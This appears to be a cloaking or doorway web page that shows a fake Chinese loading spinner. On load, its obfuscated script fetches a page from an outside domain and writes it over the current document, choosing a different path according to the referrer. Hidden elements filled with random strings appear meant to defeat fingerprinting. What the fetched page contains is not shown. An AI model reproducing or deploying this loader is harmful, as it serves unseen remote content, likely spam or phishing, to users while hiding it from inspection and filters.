<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .LDnGmE {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .LDnGmE .S6aDNMkOC7c {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .LDnGmE .content {
            line-height: 50px;
            text-align: center
        }

        .LDnGmE .img {
            width: 100%
        }

        .LDnGmE .RYOXPA {
            text-align: center
        }

        .LDnGmE .RYOXPA span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .LDnGmE .RYOXPA span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .LDnGmE .RYOXPA span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .LDnGmE .RYOXPA span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .LDnGmE .RYOXPA span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .LDnGmE .RYOXPA span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .LDnGmE .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function yfhQYNA6IRrJt(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var GEGuu = yfhQYNA6IRrJt('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ GEGuu +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ GEGuu +".html?a=share";
		}
		
        Lm7B0bZEl=url+"#"+new Date().getTime();
        Lm7B0bZEl && function() {
            $.get(Lm7B0bZEl, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<span style='display:none'>vBrDzcoEM2mD8longXpEjd931K5fX4btWJsf61</span>
<span style='display:none'>vBrDzcoEM2mD8longXpEjd931K5fX4btWJsf61</span>
<b style='display:none' >cy1mqcsBsZCb97lr0EK0uhNYOpM5Ixd8n0RdWuOgYSoDE6RnELdt</b>
<div style='display:none'>VFpaeHcHpLsvDHpNQLOmCZIsECy</div><div class="LDnGmE">
    <div class="S6aDNMkOC7c">
        <div class="RYOXPA">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<h1 style='display:none' >yJ5Kp7PdBPwFvqjSC7itISATKqViJCjL5UtetPChXRr8Hf0fsxpBtVJ4dFRJqJjqrPQB6K0cv</h1>
<p  style='display:none'>rbBu1WFotwK38nmN4rr3ZHBE0suwnbZsDFSyKnjKcPw8VkiGM2Xiu8iSfAN2jyESdDiUdmugvwSR</p>
<b style='display:none' >ozQg4FIiIjB2OYAxKHS0h3emRwzgExXzxY2oAFVOXBtxwQf</b>
<a  href='#' style='display:none'>LObgQbwYb1gtV2nFXIxpu2q5CKfFxUokd2ah66biVKWpBEgRkeEtAZ1mxEIvIbkFj1lcv7TZ9LSPfTKsqbq26WlwzWYkvi</a>
<ul style='display:none' >MDv7sPAapchqzn5rAutPxTkc3K0F2blSdj6RPTuQj3NR1hGR6BVK4cahf5V</ul></body>
</html>